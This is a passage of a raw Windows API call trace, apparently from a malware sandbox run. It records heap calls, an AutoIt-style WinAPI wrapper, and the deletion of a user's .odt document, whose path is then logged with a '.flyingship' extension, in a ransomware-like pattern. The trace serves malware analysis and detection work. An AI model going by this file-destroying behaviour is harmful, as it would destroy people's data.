[0178.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0178.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0178.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0178.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0178.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0178.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0178.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0178.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0178.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0178.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0178.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0178.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0178.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0178.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0178.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0178.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0178.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0178.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0178.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0178.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0178.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0178.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0178.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3540 | out: hHeap=0x8a0000) returned 1 [0178.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0178.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0178.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0178.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0178.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0178.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0178.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0178.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0178.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0178.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0178.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0178.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0178.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0178.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0178.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0178.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0178.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0178.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0178.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0178.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0178.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0178.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0178.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0178.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0178.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0178.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0178.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0178.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0178.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0178.939] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0178.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0178.939] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0178.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0178.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0178.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0178.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18f0 [0178.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0178.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0178.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0178.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0178.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0178.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0178.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0178.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0178.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0178.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0178.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0178.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0178.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0178.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0178.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0178.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0178.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0178.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0178.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0178.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b50 [0178.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0178.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0178.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a00 [0178.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0178.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0178.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0178.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0178.941] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0178.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0178.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0178.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0178.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0178.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0178.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0178.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0178.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0178.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0178.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0178.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0178.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0178.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0178.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0178.941] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0178.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0178.942] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0178.943] FreeLibrary (hLibModule=0x75990000) returned 1 [0178.943] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.943] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.943] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.943] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.943] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0178.943] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.943] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.944] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0178.944] FreeLibrary (hLibModule=0x75990000) returned 1 [0178.944] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.944] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.944] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.944] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt", lpFilePart=0x0) returned 0x58 [0178.946] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99398460, ftCreationTime.dwHighDateTime=0x1d5e685, ftLastAccessTime.dwLowDateTime=0xa24a8550, ftLastAccessTime.dwHighDateTime=0x1d5dc43, ftLastWriteTime.dwLowDateTime=0xfeef780, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x108d, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="g4FThfJBWB6.odt", cAlternateFileName="G4FTHF~1.ODT")) returned 0x90af58 [0178.946] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\orhlgisqmqrnaihm\\g4fthfjbwb6.odt")) returned 1 [0178.948] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99398460, ftCreationTime.dwHighDateTime=0x1d5e685, ftLastAccessTime.dwLowDateTime=0xa24a8550, ftLastAccessTime.dwHighDateTime=0x1d5dc43, ftLastWriteTime.dwLowDateTime=0xfeef780, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x108d, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="g4FThfJBWB6.odt", cAlternateFileName="G4FTHF~1.ODT")) returned 0 [0178.948] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0178.948] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.948] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.948] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0178.948] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0178.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="odt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0178.949] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0178.949] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0178.949] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0178.949] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0178.950] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0178.950] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.950] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0178.950] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.950] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0178.950] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0178.950] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x199d, lpOverlapped=0x0) returned 1 [0178.951] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0178.951] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x199d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.951] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0178.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0178.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0178.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0178.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0178.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.flyingship.odt\r\n", cchWideChar=102, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 102 [0178.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x66) returned 0x8e8320 [0178.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.flyingship.odt\r\n", cchWideChar=102, lpMultiByteStr=0x8e8320, cbMultiByte=102, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.flyingship.odt\r\n", lpUsedDefaultChar=0x0) returned 102 [0178.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0178.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0178.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8320 | out: hHeap=0x8a0000) returned 1 [0178.951] WriteFile (in: hFile=0x120, lpBuffer=0x906f38*, nNumberOfBytesToWrite=0x65, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x906f38*, lpNumberOfBytesWritten=0x87f43c*=0x65, lpOverlapped=0x0) returned 1 [0178.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0178.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0178.951] CloseHandle (hObject=0x120) returned 1 [0178.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0178.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0178.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0178.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0178.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0178.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0178.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0178.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0178.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0178.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0178.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0178.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0178.954] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0178.954] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0178.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0178.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0178.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0178.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0178.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3478 | out: hHeap=0x8a0000) returned 1 [0178.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0178.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 